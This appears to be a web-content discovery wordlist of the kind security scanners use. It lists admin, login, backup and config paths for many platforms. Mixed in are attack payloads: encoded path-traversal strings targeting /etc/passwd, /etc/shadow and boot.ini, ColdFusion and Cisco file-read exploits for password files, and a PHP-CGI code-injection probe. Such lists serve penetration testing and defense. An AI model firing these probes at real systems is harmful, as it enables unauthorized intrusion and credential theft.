/
/0/
/1/
/10/
/~10/*.aspx?aspxerrorpath=/
/~10*/*.aspx?aspxerrorpath=/
/~11/*.aspx?aspxerrorpath=/
/~11*/*.aspx?aspxerrorpath=/
/~1/*.aspx?aspxerrorpath=/
/~1*/*.aspx?aspxerrorpath=/
/1.sql
/2/
/2018/02/20/cobalt_strike_redirectors.html
/%23config.php%23
/%23configuration.php%23
/%23.htaccess%23
/%23LocalSettings.php%23
/%23mt-config.cgi%23
/%23settings.php%23
/%23wp-config.php%23
/~2/*.aspx?aspxerrorpath=/
/~2*/*.aspx?aspxerrorpath=/
%2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot%2Eini
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini
%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd
%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb
///..%2f..%2f..%2f..%2fboot.ini
%2F%2Fetc%2Fpasswd
/3/
/~3/*.aspx?aspxerrorpath=/
/~3*/*.aspx?aspxerrorpath=/
/%3f*~10*/*.aspx?aspxerrorpath=/
/%3f*~11*/*.aspx?aspxerrorpath=/
/%3f*~1*/*.aspx?aspxerrorpath=/
/%3f*~2*/*.aspx?aspxerrorpath=/
/%3f*~3*/*.aspx?aspxerrorpath=/
/%3f*~4*/*.aspx?aspxerrorpath=/
/%3f*~5*/*.aspx?aspxerrorpath=/
/%3f*~6*/*.aspx?aspxerrorpath=/
/%3f*~7*/*.aspx?aspxerrorpath=/
/%3f*~8*/*.aspx?aspxerrorpath=/
/%3f*~9*/*.aspx?aspxerrorpath=/
/4/
/~4/*.aspx?aspxerrorpath=/
/~4*/*.aspx?aspxerrorpath=/
/_4dm1n/
/4dm1n/
/5/
/~5/*.aspx?aspxerrorpath=/
/~5*/*.aspx?aspxerrorpath=/
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%2fpasswd
/..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
/6/
/~6/*.aspx?aspxerrorpath=/
/~6*/*.aspx?aspxerrorpath=/
/7/
/~7/*.aspx?aspxerrorpath=/
/~7*/*.aspx?aspxerrorpath=/
/8/
/852566C90012664F
/~8/*.aspx?aspxerrorpath=/
/~8*/*.aspx?aspxerrorpath=/
/9/
/~9/*.aspx?aspxerrorpath=/
/~9*/*.aspx?aspxerrorpath=/
/a/
/about/
/about/?callback=test
/about/?call=test
/about/?cb=test
/about/?jcb=test
/about/?jsonpcallback=test
/about/?jsonp=test
/acceso/
/access/
/AccessPlatform/auth/clientscripts/
/accesswatch/
/acciones/
/account/
/account.asp
/account.aspx
/account.cfm
/account.html
/accounting/
/account.jsp
/account.php
/active/
/activex/
/actuator/
/adm/
/Adm/
/_adm1n/
/adm1n/
/adm/admloginuser.asp
/adm/admloginuser.aspx
/adm/admloginuser.cfm
/adm/admloginuser.jsp
/adm/admloginuser.php
/adm.asp
/adm.aspx
/adm_auth.asp
/adm_auth.aspx
/adm_auth.cfm
/adm_auth.jsp
/adm_auth.php
/adm/barra/assetmanager/assetmanager.php
/adm.cfm
/admcgi/
/adm.html
/admin
/~admin
/_admin/
/admin/
/_Admin/
/Admin/
/admin108/
/admin1.php
/admin2.asp
/admin2.aspx
/admin2/index.asp
/admin2/index.aspx
/admin2/index.cfm
/admin2/index.jsp
/admin2/index.php
/admin2.jsp
/admin2/login.asp
/admin2/login.aspx
/admin2/login.cfm
/admin2/login.jsp
/admin2/login.php
/admin2.php
/admin4.nsf
/admin5.nsf
/admin/account.asp
/admin/account.aspx
/admin/account.cfm
/admin/account.html
/admin/account.jsp
/admin/account.php
/admin/admin/
/admin/admin.asp
/admin/admin.aspx
/admin/admin.cfm
/admin/admin.html
/admin/admin.jsp
/admin/admin_login.asp
/admin/admin-login.asp
/admin/adminLogin.asp
/admin/admin_login.aspx
/admin/admin-login.aspx
/admin/adminLogin.aspx
/admin/admin_login.cfm
/admin/admin-login.cfm
/admin/adminLogin.cfm
/admin/admin_login.html
/admin/admin-login.html
/admin/adminLogin.html
/admin/admin_login.jsp
/admin/admin-login.jsp
/admin/adminLogin.jsp
/admin/admin_login.php
/admin/admin-login.php
/admin/adminLogin.php
/admin/admin.php
/admin_area/
/adminarea/
/admin_area/admin.asp
/adminarea/admin.asp
/admin_area/admin.aspx
/adminarea/admin.aspx
/admin_area/admin.cfm
/adminarea/admin.cfm
/admin_area/admin.html
/adminarea/admin.html
/admin_area/admin.jsp
/adminarea/admin.jsp
/admin_area/admin.php
/adminarea/admin.php
/admin_area/index.asp
/adminarea/index.asp
/admin_area/index.aspx
/adminarea/index.aspx
/admin_area/index.cfm
/adminarea/index.cfm
/admin_area/index.html
/adminarea/index.html
/admin_area/index.jsp
/adminarea/index.jsp
/admin_area/index.php
/adminarea/index.php
/admin_area/login.asp
/adminarea/login.asp
/admin_area/login.aspx
/adminarea/login.aspx
/admin_area/login.cfm
/adminarea/login.cfm
/admin_area/login.html
/adminarea/login.html
/admin_area/login.jsp
/adminarea/login.jsp
/admin_area/login.php
/adminarea/login.php
/admin.asp
/admin.aspx
/admin/backup/
/admin.cfm
/admin/CiscoAdmin.jhtml
/admin-console/
/admincontrol.asp
/admincontrol.aspx
/admincontrol.cfm
/admincontrol.html
/admincontrol.jsp
/admincontrol/login.asp
/admincontrol/login.aspx
/admincontrol/login.cfm
/admincontrol/login.html
/admincontrol/login.jsp
/admincontrol/login.php
/admin/controlpanel.asp
/admin/controlpanel.aspx
/admin/controlpanel.cfm
/admin/controlpanel.html
/admin/controlpanel.jsp
/admin/controlpanel.php
/admincontrol.php
/admincp/
/admin_cp.asp
/admin/cp.asp
/admin/cp.aspx
/admin/cp.cfm
/admin/cp.html
/admincp/index.asp
/admincp/index.aspx
/admincp/index.cfm
/admincp/index.html
/admincp/index.jsp
/admin/cp.jsp
/admincp/login.asp
/admincp/login.aspx
/admincp/login.cfm
/admincp/login.jsp
/admincp/login.php
/admin/cp.php
/adm/index.asp
/adm/index.aspx
/adm/index.cfm
/adm/index.html
/adm/index.jsp
/adm/index.php
/admin/download/backup.sql
/admin/environment.xml
/admin/home.asp
/admin/home.aspx
/admin/home.cfm
/admin/home.html
/admin/home.jsp
/admin/home.php
/admin.html
/admin/includes/FCKeditor/editor/filemanager/upload/test.html
/admin/includes/tiny_mce/plugins/tinybrowser/upload.php
/admin/index.asp
/admin/index.aspx
/admin/index.cfm
/admin/index.html
/admin/index.jsp
/admin/index.php
/administer/
/administr8/
/administr8.asp
/administr8.aspx
/administr8.cfm
/administr8.jsp
/administr8.php
/administracao.asp
/administracao.aspx
/administracao.cfm
/administracao.jsp
/administracao.php
/_administracion/
/Administracion/
/administracion.asp
/administracion.aspx
/administracion.cfm
/administracion.jsp
/administracion.php
/administracion-sistema/
/_administrador/
/_administradores/
/administrator
/~administrator
/_administrator/
/administrator/
/Administrator/
/administrator/account.asp
/administrator/account.aspx
/administrator/account.cfm
/administrator/account.html
/administrator/account.jsp
/administrator/account.php
/administrator.asp
/administrator.aspx
/administrator.cfm
/administrator.html
/administrator/index.asp
/administrator/index.aspx
/administrator/index.cfm
/administrator/index.html
/administrator/index.jsp
/administrator/index.php
/administrator.jsp
/administratorlogin/
/administrator/login.asp
/administratorlogin.asp
/administrator/login.aspx
/administratorlogin.aspx
/administrator/login.cfm
/administratorlogin.cfm
/administrator/login.html
/administrator/login.jsp
/administratorlogin.jsp
/administrator/login.php
/administratorlogin.php
/administrator/manifests/files/joomla.xml
/administrator.php
/_administrators/
/administrators/
/administrator/wp-login.php
/admin/jscript/upload.asp
/admin/jscript/upload.html
/admin/jscript/upload.php
/admin/jscript/upload.pl
/admin.jsp
/admin/libraries/ajaxfilemanager/ajaxfilemanager.php
/adminLogin/
/admin_login.asp
/admin-login.asp
/admin/login.asp
/adminLogin.asp
/AdminLogin.asp
/admin_login.aspx
/admin-login.aspx
/admin/login.aspx
/adminLogin.aspx
/AdminLogin.aspx
/admin_login.cfm
/admin-login.cfm
/admin/login.cfm
/adminLogin.cfm
/AdminLogin.cfm
/admin_login.html
/admin-login.html
/admin/login.html
/adminLogin.html
/admin_login.jsp
/admin-login.jsp
/admin/login.jsp
/adminLogin.jsp
/AdminLogin.jsp
/admin_login.php
/admin-login.php
/admin/login.php
/adminLogin.php
/AdminLogin.php
/admin.nsf
/_admin/operations.aspx
/adminpanel.asp
/adminpanel.aspx
/adminpanel.cfm
/adminpanel.html
/adminpanel.jsp
/adminpanel.php
/admin.php
/adminpro/
/_admins/
/admins/
/admins.asp
/admins.aspx
/admins.cfm
/admins.jsp
/admins.php
/admin/upload.php
/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
/admin/views/ajax/autocomplete/user/-
/admin/views/ajax/autocomplete/user/.
/admin/views/ajax/autocomplete/user/+
/admin/views/ajax/autocomplete/user/1
/admin/views/ajax/autocomplete/user/2
/admin/views/ajax/autocomplete/user/3
/admin/views/ajax/autocomplete/user/4
/admin/views/ajax/autocomplete/user/5
/admin/views/ajax/autocomplete/user/6
/admin/views/ajax/autocomplete/user/7
/admin/views/ajax/autocomplete/user/8
/admin/views/ajax/autocomplete/user/9
/admin/views/ajax/autocomplete/user/a
/admin/views/ajax/autocomplete/user/b
/admin/views/ajax/autocomplete/user/c
/admin/views/ajax/autocomplete/user/d
/admin/views/ajax/autocomplete/user/e
/admin/views/ajax/autocomplete/user/f
/admin/views/ajax/autocomplete/user/g
/admin/views/ajax/autocomplete/user/h
/admin/views/ajax/autocomplete/user/i
/admin/views/ajax/autocomplete/user/j
/admin/views/ajax/autocomplete/user/k
/admin/views/ajax/autocomplete/user/l
/admin/views/ajax/autocomplete/user/m
/admin/views/ajax/autocomplete/user/n
/admin/views/ajax/autocomplete/user/o
/admin/views/ajax/autocomplete/user/p
/admin/views/ajax/autocomplete/user/q
/admin/views/ajax/autocomplete/user/r
/admin/views/ajax/autocomplete/user/s
/admin/views/ajax/autocomplete/user/t
/admin/views/ajax/autocomplete/user/u
/admin/views/ajax/autocomplete/user/v
/admin/views/ajax/autocomplete/user/w
/admin/views/ajax/autocomplete/user/x
/admin/views/ajax/autocomplete/user/y
/admin/views/ajax/autocomplete/user/z
/admisapi/
/adm.jsp
/admloginuser.asp
/admloginuser.aspx
/admloginuser.cfm
/admloginuser.jsp
/admloginuser.php
/adm.php
/a_domlog.nsf
/adr.htm
/adserver/www/admin/index.php
/ads/www/admin/index.php
/AdvWebAdmin/
/affiliate.php
/Agent/
/agentes/
/agentrunner.nsf
/Agents/
/ajaxfilemanager/
/Album/
/AlbumArt_/
/AlbumArt/
/allow/
/alog.nsf
/amember/
/analog/
/anthill/
/apache/
/aphpkb/
/api/id/
/app/
/_app_bin
/App_Config/Security/Domains.config.xml
/App_Config/Security/GlobalRoles.config.xml
/appl/
/applets/
/application/
/applications/
/applmgr/
/apply/
/apps/
/appsec/
/appServer/jvmReport.jsf?instanceName=server&pageTitle=JVM%20Report
/ar/
/archiva/index.action
/archive/
/archive/flash:home/html/images/Cisco_logo.gif
/archives/
/arcsight/
/arcsight/images/logo-login-arcsight.gif
/arcsight/images/navbar-icon-logout-on.gif
/asa/
/asp/
/assetmanager/assetmanager.asp
/atc/
/atom/
/atom.aspx
/atom.jsp
/atom.php
/atom.xml
/auditevents/
/aut/
/auth/
/authadmin/
/author/
/authors/
/autoconfig/
/a_viewusers.php
/aw/
/awstats/awstatstotals.php
/awstats/index.php
/awstatstotals/awstatstotals.php
/awstatstotals/index.php
/awstatstotals.php
/axis2/
/axis2-admin/
/axis2/axis2-admin/
/axis2/axis2-web/HappyAxis.jsp
/axis2/services/listServices
/ayuda/
/b/
/b2-include/
/back/
/backend/
/Backstage/Components/FreeTextBox/ftb.imagegallery.aspx
/backup
/backup/
/BackupConfig.php
/backups/
/backup.sql
/backup.sql.bz2
/backup.sql.gz
/backup.zip
/bad/
/bak/
/banca/
/banco/
/bank/
/banner/
/banner01/
/banners/
/bar/
/Base/example_1.php
/Base/upload.php
/batch/
/bb-admin/
/bb-admin/admin.asp
/bb-admin/admin.aspx
/bb-admin/admin.cfm
/bb-admin/admin.html
/bb-admin/admin.jsp
/bb-admin/admin.php
/bb-admin/index.asp
/bb-admin/index.aspx
/bb-admin/index.cfm
/bb-admin/index.html
/bb-admin/index.jsp
/bb-admin/index.php
/bb-admin/login.asp
/bb-admin/login.aspx
/bb-admin/login.cfm
/bb-admin/login.html
/bb-admin/login.jsp
/bb-admin/login.php
/bb-dnbd/
/bbv/
/bdata/
/bdatos/
/bdb.sql
/beans/
/beef/
/BEEF/
/beef/images/beef.gif
/beta/
/billpay/
/bin/
/binaries/
/binary/
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/blog
/blog/
/blog/wp-login.php
/bnnr.php
/boadmin/
/board/docs/CHANGELOG.html
/boards/docs/CHANGELOG.html
/bookmark.nsf
/boot/
////..\\..\\..\\boot.ini
/../../../../../../../../../../boot.ini
/..\\/..\\/..\\/boot.ini
/..\\/\\..\\/\\..\\/\\boot.ini
/..\\..\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini
/\\../\\../\\../boot.ini
/boot.ini
..\\\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\boot.ini
/bottom/
/browse/
/browser/
/browserId/wizardForm.jhtml
/browserId/wizard.jhtml
/bsc_lan.php
/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0
/bsd/
/b.sql
/btauxdir/
/bug/
/bugs/
/bugzilla/
/busytime.nsf
/buy/
/buynow/
/.bzrignore
/.bzr/README
/c/
/%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\boot.ini
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini
%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini
/cache/
/cache/backup/
/cached/
/cache-stats/
/cacti/
/caja/
/cal/cal_cat.php
/cal_cat.php
/calendar/cal_cat.php
/calendar/cal_search.php
/?callback=test
/callme/callForm.jhtml
/?call=test
/cal_search.php
/card/
/cards/
/cart/
/cart/docs/
/cash/
/caspsamp/
/catalog/
/catalog/main.php?cat_id=
/catalog.nsf
/categories/allcategories.aspx
/categories/SOMEOTHERDIR/allcategories.aspx
/categories/viewcategory.aspx
/cbi-bin/
/?cb=test
/ccard/
/ccards/
/cd/
/cd-cgi/
/cdrom/
/ce_html/
/cert/
/certa.nsf
/certificado/
/certificate/
/certlog.nsf
/certsrv.nsf
/cfappman/
/cfdocs/
/cfide/
/CFIDE/adminapi/administrator.cfc?method=login&adminpassword=&rdsPasswordAllowed=true
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/analyzer/index.cfm&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\cfusion\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\cfusion\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=..\\..\\lib\\password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp
/CFIDE/administrator/archives/index.cfm
/CFIDE/administrator/enter.cfm
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en
/CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en
/CFIDE/administrator/entman/index.cfm
/CFIDE/administrator/images/loginbackground.jpg
/CFIDE/Administrator/startstop.html
/CFIDE/componentutils/login.cfm
/cfide/install.cfm
/CFIDE/wizards/common/_logintowizard.cfm
/cgi/
/cgi-914/
/cgi-915/
/cgi-auth/
/cgi-bin/
/cgibin/
/cgi-bin2/
/cgi-bin/authLogin.cgi
/cgi-bin/awstats.pl
/cgi-bin/ck/mimencode
/cgi-bin/ffileman.cgi?
/cgi-bin/image/shikaku2.png
/cgi-bin/masterCGI?
/cgi-bin/mj_wwwusr
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/cgi-bin/vcs
/cgi.cgi/
/cgi-csc/
/cgi-exe/
/cgi-home/
/cgi-lib/
/cgilib/
/cgi-local/
/cgi-mod/index.cgi
/cgi-mod/smtp_test.cgi
/cgi-mod/view_help.cgi
/cgi-perl/
/cgis/
/cgi-scripts/
/cgiscripts/
/cgi-shl/
/cgi-shop/
/cgi-sys/
/cgi-weddico/
/cgi-win/
/cgiwin/
/changelog.txt
/CHANGELOG.txt
/channel_detail.php
/chatlog.nsf
/cheat_sheets/
/cheat_sheets/?callback=test
/cheat_sheets/?call=test
/cheat_sheets/?cb=test
/cheat_sheets/?jcb=test
/cheat_sheets/?jsonpcallback=test
/cheat_sheets/?jsonp=test
/cirronetlogo.gif
/citrix/
/Citrix/
/citrix/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
/Citrix/AccessPlatform/auth/clientscripts/login.js
/Citrix/MetaFrame/auth/login.aspx
/Citrix/PNAgent/config.xml
/class/
/classes/
/clbusy.nsf
/cldbdir.nsf
/client/
/clientaccesspolicy.xml
/cliente/
/clientes/
/clients/
/client/VMware-viclient.exe
/clusta4.nsf
/cluster/cluster
/cm/
//cmdownloads/?CMDsearch=%22.base64_decode%28%22REVFQUtLSVpUSUdHTFNP%22%29.%22
/cmf/login
/cms/
/cmsample/
/cmspages.php
/cobalt-images/
/code/
/cognos_express/manager/html/
/collect4.nsf
/com/
/comic/
/comiccms/
/comments/
/common/
/common/appServer/jvmReport.jsf?pageTitle=JVM%20Report
/common/appServer/jvmReport.jsf?reportType=summary&instanceName=server
/common/help/en/go/login_ts.html
/common/images/logos/img_logoMain.jpg
/communicator/
/comp/
/company/
/compra/
/compras/
/compressed/
/conecta/
/conf/
/config/
/config%20copy.php
/config.bak
/config.php~
/config.php.bak
/config.php.old
/config.php.save
/.config.php.swp
/config.php.swp
/configprops/
/config/public/usergrp.gif
/configs/
/configuration%20copy.php
/configuration.bak
/configuration.php~
/configuration.php.bak
/configuration.php.old
/configuration.php.save
/.configuration.php.swp
/configuration.php.swp
/configure/
/confirminvite.php
/connect/
/console/
/console/login/loginForm.jsp
/console/portal/0/Welcome
/contact/
/contacts/
/content/
/content.ie5/
/controlpanel/
/controlpanel.asp
/controlpanel.aspx
/controlpanel.cfm
/controlpanel.html
/controlpanel.jsp
/controlpanel.php
/_controltemplates
/Copy%20(2)%20of%20index.xml
/Copy%20of%20config.php
/Copy%20of%20configuration.php
/Copy%20of%20.htaccess
/Copy%20of%20index.xml
/Copy%20of%20LocalSettings.php
/Copy%20of%20mt-config.cgi
/Copy%20of%20settings.php
/Copy%20of%20wp-config.php
/core/
/corp/
/correo/
/counter/
/cp.asp
/cp.aspx
/cp.cfm
/cp.html
/cp.jsp
/cp.php
/cpqlogin.htm?RedirectUrl=/&RedirectQueryString=
/credit/
/cron/
/crons/
/crossdomain.xml
/crypto/
/CS/
/CSCOSSLC/config-auth
/csr/
/css/
/css/all.min%20copy.css
/css/all.min.bak
/css/all.min.css
/css/all.min.css~
/css/all.min.css.1
/css/all.min.css.~1~
/css/all.min.css?callback=test
/css/all.min.css?call=test
/css/all.min.css?cb=test
/css/all.min.css?jcb=test
/css/all.min.css?jsonpcallback=test
/css/all.min.css?jsonp=test
/css/cake.generic.css
/css/Copy%20(2)%20of%20all.min.css
/css/Copy%20of%20all.min.css
/CSS/Miniweb.css
/cuenta/
/cuentas/
/currency/
/cust/
/custom/
/customer/
/customers/
/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
/cvs/
/CVS/
/cvsweb/
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\boot.ini
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\lib\\classpath\\com\\cisco\\nm\\cmf\\dbservice2\\DBServer.properties
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\log\\dbpwdChange.log
/cwhp/auditLog.do?file=..\\..\\..\\..\\..\\..\\..\\Program%20Files\\CSCOpx\\MDC\\Tomcat\\webapps\\triveni\\WEB-INF\\classes\\schedule.properties
/cybercash/
/d/
/d41d8cd98f00b204e9800998ecf8427e.php
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
/da.nsf
/darkportal/
/Dashboard/Dashboard.html
/dat/
/data/
/database/
/databases/
/databases/acidcat_3.mdb
/database.sql
/datafiles/
/data.sql
/dato/
/datos/
/db/
/dba4.nsf
/dbadmin/
/dbase/
/dbbackup.txt
/db.sql
/db/users.mdb
/dcforum/
/dclf.nsf
/ddb.sql
/ddreport/
/ddrint/
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/debug/
/debug.cgi
/debugs/
/debug.seam
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/default/
/Default?MAIN=DEVICE
/delete/
/deleted/
/demo/
/demoauct/
/demomall/
/demos/
/demouser/
/deny/
/deploymentmanager/
/derived/
/design/
/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////
/dev/
/devel/
/development/
/dhost/
/digg/readme.html
/dir/
/dirassist.nsf
/directories/
/directory/
/directorymanager/
/dl/
/dm/
/dm-albums/dm-albums.php
/DMR/
/dms/
/dms0/
/dmsdump/
/dms/README
/dnn/
/doc/
/doc1/
/doc-html/
/_docs/
/docs/
/docs1/
/docs/CHANGELOG.html
/docs/README
/DocuColor/
/document/
/documentation/
/documents/
/documents/README
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dotDefender/
/dotnetnuke/
/down/
/download/
/downloadFile.php
/downloads/
/dsc/
/dsp_page.cfm
/dspug.nsf
/dump/
/dump.sql
/durep/
/e/
/easylog/
/ecoder/
/editdocs.aspx
/editor/editor/filemanager/upload/test.html
/eforum/
/egroupware/
/ehcp/?op=applyforaccount
/ehcp/?op=applyfordomainaccount
/ehcp/?op=applyforftpaccount
/ejemplo/
/ejemplos/
/email/
/emailclass/
/employees/
/empoyees/
/empris/
/engine/api/api.class.php
/en/images/nav_sl_home_network_01.gif
/enter/
/env/
/envia/
/enviamail/
/en/welcomeRes.js
/error/
/errors/
/es/
/ESAdmin/
/escort-profile.php
/es/images/nav_sl_home_network_01.gif
/estmt/
/etc/
/../../../../../../../../../../etc/passwd
/../../../../../../../etc/passwd
/etc/passwd
/etcpasswd/
/event.nsf
/events4.nsf
/events5.nsf
/events.nsf
/evox/about
/example/
/examples/
/Examples/
/exc/
/excel/
/exchange/
/exchweb/
/exchweb/bin/auth/owalogon.asp
/exe/
/exec/
/exec/show/log/CR
/exit/
/export/
/external/
/extrahop/
/extranet/
/eyeos/
/f/
/f9b9d23ed04f6583dcd6b9205c5707c2cefebcfa.htm
/failure/
/favicon.ico
/fbsd/
/fcgi/
/fcgi-bin/
/FCKEditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/connectors/php/config.php
/fckeditor/editor/filemanager/connectors/test.html
/fckeditor/editor/filemanager/upload/test.html
/features/
/feed
/feed/
?feed=atom
/feed/atom
?feed=rss
/feed/rss
?feed=rss2
/feed/rss2
/file/
/fileadmin/
/filemanager/
/files/
/Final/login/ava_upl2.php
/Final/login/ava_upl.php
/find/
/flash/
/flex2gateway/http
/flex2gateway/httpsecure
/flexfm/
/flyway/
/fm.php
/foldoc/
/foo/
/foobar/
/footer1.gif
/form/
/forms/
/forms/allitems.aspx
/formsmgr/
/forms/mod-view.aspx
/forms/my-sub.aspx
/forms/webfldr.aspx
/form-totaller/
/forum/
/forum_answer.php?que_id=1
/forum/bnnr.php
/forum/docs/CHANGELOG.html
/forums/
/forums/docs/CHANGELOG.html
/foto/
/fotos/
/fpadmin/
/fpclass/
/fpdb/
/fpe/
/fpsample/
/frames/
/framesets/
/frontend/x3/
/frontpage/
/fshow.php
/ftp/
/ftproot/
/fun/
/func/
/function/
/functions/
/g/
/general/
/getsimple/
/gfx/
/gfx/form_top_left_corner.gif
/gfx/logout_24.png
/gfx/new_logo.gif
/gif/
/gif/hp.gif
/gif/hp_invent_logo.gif
/gif/printer.gif
/gifs/
/.git/HEAD
/.gitignore
/global/
/globals/
/globalSIPsettings.html
/good/
/graphics/
/grocery/
/~guest
/guest/
/guestbook/
/guests/
/GXApp/
/h/
/happyaxis.jsp
/HB/
/HBTemplates/
/health/
/heapdump/
/help/
/helpdesk/
/help/../../etc/shadow
/.hgignore
/.hg/requires
/hidden/
/hide/
/hitmatic/
/hit_tracker/
/hlstats/
/HNAP1/
/home
/home/
/home.asp
/home.aspx
